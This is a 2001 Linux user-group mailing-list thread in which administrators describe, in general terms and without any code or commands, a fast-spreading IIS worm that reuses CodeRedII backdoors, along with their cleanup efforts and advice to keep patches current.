[TriLUG] Battleing new IIS worm - appreciate ANY help!
Tue, 18 Sep 2001 14:33:13 -0400
This is a *nasty one*...
I am current on all my patches! This bug is a new one though, and must use
a new exploit. Fortunately, you can lock down Win200 enough that this
particular worm can't get access to the system directories (at least not
yet!). Our only problems have been with installs of IIS on NT.
The bug is well written. It doesn't show itself until there is traffic on
the site, so you can think you've cleaned it off but as soon as you get a
few hits, it lights up and takes over again! It took us three tries to nuke
it. I think I got it clean on the second try, but re-infection was very
fast. The "tftp" fix seems to have stalled that for now.
As an aside, the marketing folks are finally publishing to the new webserver
I built for them two weeks ago. An apache server, running on Linux...
----- Original Message -----
From: "Mike Johnson" <email@example.com>
Sent: Tuesday, September 18, 2001 1:08 PM
Subject: Re: [TriLUG] Battleing new IIS worm - appreciate ANY help!
> Jon Carnes [firstname.lastname@example.org] wrote:
> > Yah its off topic...
> You'll want to check the Incidents lists at SecurityFocus.
> Well, details seem to still be coming in. This one is a nifty little
> hybrid that spreads via e-mail and by attacking systems directly.
> It uses obfuscation to try and hide from IDS, and trys to access
> the root.exe and cmd.exe left behind by CodeRedII.
> Cute, no?
> One more time: if you are going to run IIS, you better stay
> on top of patches. If you are going to run Outlook, you better
> stay on top of patches. If you are going to run IE, you better
> stay on top of patches (the worm uploads code to the compromised
> web servers which will cause anyone using IE to be at risk
> when they visit the website). If you are going to run Windows,
> you better stay on top of patches (just thew that one in for
> good measure).
> Never trust a man who puts anything other than a finger up his nose. -
> TriLUG mailing list